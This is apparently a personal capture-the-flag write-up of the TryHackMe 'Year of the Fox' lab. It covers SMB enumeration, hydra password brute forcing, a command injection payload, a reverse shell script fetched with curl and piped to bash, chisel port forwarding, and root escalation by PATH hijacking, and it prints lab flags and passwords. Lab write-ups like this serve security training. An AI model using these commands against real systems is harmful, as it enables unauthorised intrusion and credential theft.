Skip to main content
  1. Writeups/
  2. TryHackMe/

Year of the Fox

·776 words·4 mins
TryHackMe Linux Hard
K21
Author
K21
I am human.
Tryhackme Streamline Icon: https://streamlinehq.comTryHackMe
Table of Contents

Enumeration
#

Lets start with the portscan.

PORT    STATE SERVICE      REASON
80/tcp  open  http         syn-ack
139/tcp open  netbios-ssn  syn-ack
445/tcp open  microsoft-ds syn-ack

Lets enumerate smb.

But access denied.

and we can see the user fox. nxc smb 10.10.54.212 --users

So we got the username fox. Lets try to do password spray.

nxc smb 10.10.54.212 -u fox -p /usr/share/wordlists/rockyou.txt

I tried password spraying but it didn’t worked.

After sometime,it worked.

Hmm so the password is abcdefg. Really? really?.

Okay.

Lets see what we got.

We can decrypt it.

5c8d7f5eaa6208803b7866d9cbf0ea8a30198a2f8f4426cbe5a4267b272e90a8
716be5b5c8943800c7be592cce374a22be2d7376a263b01791f3fb09182ad284

Lets see. I spent lots of time figuring what is it. I take a small hint.

There is also another user. We can run enum4linux. enum4linux -a 10.10.54.212

Exploit
#

And we got another user rascal. I tried that user in port 80. But we also need password. Lets try to use hydra. hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.54.212 http-get / And we got the password.

angel17

Lets login.

Hmmm interesting.

What can we do here? Hmmm we might read files,get rce or like that. Again i was so stuck,I took the help of writeup and the payload for exploit or command injection.

\";pwd \"

So it worked.

Hmm lets try to get reverse shell. But somethingis very odd. Doing this we got the ping.

Hmm lets try to get reverse shell. It was full blind,something working and something not.

Foothold
#

Lets first make a script like this which will give us with the rev shell.

#!/bin/bash
sh -i >& /dev/tcp/ip/9999 0>&1

Now we are gonna open a python3 web sever by this command.

python3 -m http.server 8000

And we are gonna use curl to acess it and use | to execute bash.

curl http://tun0:8000/shell.sh | bash

{"target":"\";curl http://ip:8000/shell.sh | bash\n"}

Now we should have got our shell in our listenner.

Lets get a tty shell and try to escalate our priveleges. And we can see the web flag. THM{Nzg2ZWQwYWUwN2UwOTU3NDY5ZjVmYTYw}

Privelege Escalation
#

Lets run linpeas.sh. Now i have many questions here. 1.What was that smb files meant for? 2.Whats with user fox? And many more.

Hmm lets continue. Again i tried many thing but nothing worked and interestingly.

We don’t even have any permission to su.

Again after trying for several minutes,I took help from writeup and there is a internal ssh port running.

Uff. Okay lets see. Hmm lets try doing ssh with user rascal with that before password. And everything is denied.

Lets forward this port to our machine. For that,first of all download chisel from this

On your local machine.

chisel server -p 9001 --reverse

And this in victims machine.

./chisel client ip:9001 R:2222:127.0.0.1:22

So what it does is, first command listen on port 9001 to get reverse connection from chisel to expose victims port and second command connect to the our listenner and forward port 22 to our host on port 2222.

And now we can do ssh.

But password?. I tried that password of user rascal but it wasn’t working.

Hmm again after trying to find password for few minutes,i found out we need to use hydra.(obviously from writeup). Lets use that. I ran this command for a second.

 hydra -l fox -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1 -s 2222

And we got the password.

Lets do ssh as fox. elijah

Hmm now we need to became root i guess. We also got the user flag. THM{Njg3NWZhNDBjMmNlMzNkMGZmMDBhYjhk}

Lets escalate our priveleges to root. Running sudo -l,we can see that we can run /usr/sbin/shutdown as root.

Hmm lets see how we can exploit this. We don’t have any permission to do something.

Can we change the path variable? Lets see. Lets do this.

export PATH="/tmp:$PATH"

And it worked.

So now we can create a fake shutdown in /tmp. I made a shutdown contaning this.

#!/bin/bash
chmod 4777 /bin/bash
echo "Done."

So when we run shutdown,it should run our shutdown instead of real shutdown. But at first,lets give our shutdown with the executable permisssion.

chmod 777 /tmp/shutdown

But it didn’t worked. Lets see that shutdown executable.

Hmm its using poweroff. Lets see this executable.

Ohh what if instead of shutdown,we create a poweroff. Lets just copy /bin/bash to /tmp/poweroff.

Now lets give it good permission and run shutdown with sudo.

And we became root. Lets get the flag. Hmmm.

Lets search for root flag.

find / -type f -name "*root*" 2>/dev/null

And we got it.

Hmm lets read that.

But what is that base64 thing. It gives us with hash like strings after decoding. Like what we have got before in creds.txt and cipher.txt. Hmmm.

Done
#

And done.

Again learned lots of things again. I hope you are doing great. Take care :).